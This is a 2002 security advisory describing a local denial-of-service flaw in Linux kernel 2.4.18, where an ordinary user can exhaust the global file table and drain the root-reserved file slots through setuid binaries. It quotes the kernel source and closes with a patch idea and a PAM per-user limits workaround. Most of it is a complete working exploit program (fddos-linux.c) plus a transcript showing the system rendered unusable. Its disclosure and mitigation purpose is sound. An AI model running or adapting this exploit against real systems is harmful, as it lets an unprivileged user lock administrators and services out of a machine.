
Linux kernels DoSable by file-max limit
9th Jul 2002 [SBWID-5520]
COMMAND

	Linux kernels DoSable by file-max limit

SYSTEMS AFFECTED

	Linux kernel 2.4.18, at least (earlier versions likely affected as well)

PROBLEM

	Paul Starzetz [http://www.starzetz.de] says:
	

	The recently mentioned problem in BSD kernels concerning the global
	limit of open files seems to be present in the Linux kernel too.
	However, as mentioned in the advisory about the BSD-specific problem,
	the Linux kernel keeps some additional file slots reserved for the
	root user. This code can be found in the fs/file_table.c source file
	(2.4.18):
	

	struct file * get_empty_filp(void)
	{
	    static int old_max = 0;
	    struct file * f;

	    file_list_lock();
	    if (files_stat.nr_free_files > NR_RESERVED_FILES) {
	    used_one:
	        f = list_entry(free_list.next, struct file, f_list);

	[...]

	    /*
	     * Use a reserved one if we're the superuser
	     */
	[*]  if (files_stat.nr_free_files && !current->euid)
	        goto used_one;

	

	Grepping the source code (2.4.18) reveals that the limit is pretty low:
	

	./include/linux/fs.h:#define NR_RESERVED_FILES 10 /* reserved for root */

	

	The problem is obviously the check for superuser privilege in the [*]
	line: setuid-root binaries such as passwd or su run with euid 0, and
	every user can usually execute some of them, so any user can drain
	the reserved slots.
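	To make the mechanism concrete, here is a minimal illustration (a
	hypothetical demo, not part of the original advisory): a setuid-root
	binary started by an ordinary user runs with euid 0 even though the
	real uid is unchanged, so the !current->euid test marked [*] above
	passes for it.

	/* suid-demo.c -- hypothetical illustration; install with
	 *   chown root suid-demo && chmod u+s suid-demo
	 * and run it as an ordinary user. */
	#include <stdio.h>
	#include <unistd.h>

	int main(void)
	{
	    /* For a setuid-root binary run by uid 500 this prints
	     * "uid=500 euid=0": the kernel's euid check sees root. */
	    printf("uid=%d euid=%d\n", (int) getuid(), (int) geteuid());
	    return 0;
	}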
	

	The attached code demonstrates the problem (you may need to change the
	EXECBIN and FREENUM parameters):
	

	terminal1:

	dummy:~ # id
	uid=0(root) gid=0(root)
	groups=0(root),1(bin),14(uucp),15(shadow),16(dialout),17(audio),42(trusted),65534(nogroup)

	terminal2:

	paul@dummy:~> id
	uid=500(paul) gid=100(users)
	paul@dummy:~> ./fddos

	preforked child 0

	errno 24 pid 24087 got 1021 files
	errno 24 pid 24088 got 1021 files
	errno 24 pid 24089 got 1021 files
	errno 24 pid 24090 got 1021 files
	errno 24 pid 24091 got 1021 files
	errno 24 pid 24092 got 1021 files
	errno 24 pid 24093 got 1021 files
	errno 23 pid 24094 got 807 files

	file limit reached, eating some root's fd
	freeing some file descriptors...

	 pid 24094 closing 809
	 pid 24094 closing 808
	 pid 24094 closing 807
	 pid 24094 closing 806
	 pid 24094 closing 805
	 pid 24094 closing 804
	 pid 24094 closing 803
	 pid 24094 closing 802
	 pid 24094 closing 801
	 pid 24094 closing 800
	 pid 24094 closing 799
	 pid 24094 closing 798
	 pid 24094 closing 797
	 pid 24094 closing 796
	 pid 24094 closing 795
	 pid 24094 closing 794
	 pid 24094 closing 793

	executing /usr/bin/passwd
	Old Password:
	

	With the fddos binary running as a non-root user, type on terminal1:
	

	dummy:~ # id
	bash: /usr/bin/id: Too many open files in system
	dummy:~ # w
	bash: /usr/bin/w: Too many open files in system

	

	The system becomes unusable!
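	The errno values in the transcript map directly onto the two limits
	involved: errno 24 (EMFILE) means the per-process descriptor table is
	full, while errno 23 (ENFILE) means the system-wide file table is
	exhausted. A minimal sketch of how a probe can tell the two apart
	(standard C, nothing beyond what the exploit itself uses):

	#include <errno.h>
	#include <fcntl.h>
	#include <stdio.h>
	#include <unistd.h>

	/* Returns 0 if open() still succeeds, otherwise the errno that
	 * indicates which limit was hit. */
	int probe_limit(void)
	{
	    int fd = open("/dev/null", O_RDONLY);
	    if (fd >= 0) {
	        close(fd);
	        return 0;
	    }
	    if (errno == EMFILE)        /* errno 24: per-process limit */
	        puts("per-process descriptor limit reached");
	    else if (errno == ENFILE)   /* errno 23: system-wide file-max */
	        puts("system-wide file table exhausted");
	    return errno;
	}

	int main(void)
	{
	    return probe_limit();
	}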
	

	Exploitability to get uid=0 has not been confirmed yet, but seems
	possible.
	

	 Exploit code

	 ============

	

	Filename : fddos-linux.c
	

	#include <stdio.h>
	#include <stdlib.h>
	#include <unistd.h>
	#include <signal.h>
	#include <fcntl.h>
	#include <errno.h>
	#include <sys/types.h>

	#define PREFORK 1
	#define EXECBIN "/usr/bin/passwd"
	#define FREENUM 18

	/* Flags set from the signal handlers and polled in the loops below. */
	static volatile sig_atomic_t fc = 0;
	static volatile sig_atomic_t ec = 0;

	void forkmore(int v)
	{
	    fc++;
	}

	void execmore(int v)
	{
	    ec++;
	}

	int main(void)
	{
	    int r, cn, pt[PREFORK];

	    signal(SIGUSR1, &forkmore);
	    signal(SIGUSR2, &execmore);
	    printf("\n");

	    /* Prefork children that wait for SIGUSR2, then exec the setuid
	     * binary; running with euid 0, it competes for the reserved
	     * file slots. */
	    for (cn = 0; cn < PREFORK; cn++) {
	        if (!(r = fork())) {
	            printf("\npreforked child %d", cn);
	            fflush(stdout);
	            while (!ec) {
	                usleep(100000);
	            }

	            printf("\nexecuting %s\n", EXECBIN);
	            fflush(stdout);

	            execl(EXECBIN, EXECBIN, (char *) NULL);

	            printf("\nwhat the fuck?");
	            fflush(stdout);
	            while (1)
	                sleep(999999);
	            exit(1);
	        } else
	            pt[cn] = r;
	    }

	    sleep(1);
	    printf("\n\n");
	    fflush(stdout);
	    cn = 0;

	    while (1) {
	        fc = ec = 0;
	        cn++;

	        if (!(r = fork())) {
	            int cnt = 0, fd = 0, ofd = 0;

	            /* Eat descriptors until open() fails: EMFILE means this
	             * process is full (ask the parent to fork another eater),
	             * ENFILE means the global file table is exhausted. */
	            while (1) {
	                ofd = fd;
	                fd = open("/dev/null", O_RDWR);
	                if (fd < 0) {
	                    printf("errno %d ", errno);
	                    printf("pid %d got %d files\n", getpid(), cnt);
	                    fflush(stdout);

	                    if (errno == ENFILE)
	                        kill(getppid(), SIGUSR2);
	                    else
	                        kill(getppid(), SIGUSR1);

	                    break;
	                } else
	                    cnt++;
	            }

	            ec = 0;

	            /* On SIGUSR2, free a few descriptors so the setuid binary
	             * can start and grab the reserved slots. */
	            while (1) {
	                usleep(100000);
	                if (ec) {
	                    printf("\nfreeing some file descriptors...\n");
	                    fflush(stdout);
	                    for (cn = 0; cn < FREENUM; cn++) {
	                        printf("\n pid %d closing %d", getpid(), ofd);
	                        close(ofd--);
	                    }
	                    ec = 0;
	                    kill(getppid(), SIGUSR2);
	                }
	            }

	        } else {
	            while (!ec && !fc)
	                usleep(100000);

	            if (ec) {
	                printf("\n\nfile limit reached, eating some root's fd");
	                fflush(stdout);

	                sleep(1);
	                ec = 0;
	                kill(r, SIGUSR2);
	                while (!ec)
	                    sleep(1);

	                for (cn = 0; cn < PREFORK; cn++)
	                    kill(pt[cn], SIGUSR2);

	                while (1) {
	                    sleep(999999);
	                }
	            }
	        }
	    }

	    return 0;
	}
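	The exploit builds like any single-file C program; a typical
	invocation (an assumed command line, not given in the advisory) would
	be cc -o fddos fddos-linux.c, after which ./fddos is started as an
	unprivileged user as shown in the transcript above.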

	

	

SOLUTION

	 Patch

	 =====

	

	No temporary solution yet. There should be a global per-user file
	limit, and the reserved file descriptors should be handed out under a
	different uid/euid policy. The NR_RESERVED_FILES limit of 10 also
	seems really low.
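	One possible hardening, sketched against the 2.4.18 code quoted above
	(a sketch only, not an official or tested patch): require the real uid
	to be 0 as well, so setuid binaries started by ordinary users can no
	longer drain the reserved pool.

	    /*
	     * Use a reserved one only if we are "really" root, i.e. both
	     * the real and the effective uid are 0, so setuid programs
	     * started by unprivileged users do not qualify.
	     */
	    if (files_stat.nr_free_files && !current->uid && !current->euid)
	        goto used_one;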
	

	 Workaround

	 ==========

	

	PAM provides the ability to enforce per-user limits, as documented by
	Kurt Seifried; see:
	

	http://seifried.org/lasg/users/
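	As an illustration, pam_limits can cap both the number of open files
	per process and the number of processes per user via
	/etc/security/limits.conf; together these bound the total number of
	descriptors a single user can hold. The values below are assumed
	examples, not recommendations from the advisory:

	# /etc/security/limits.conf -- illustrative values
	# nofile: max open files per process; nproc: max processes per user.
	*       hard    nofile  256
	*       hard    nproc   64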

	

	
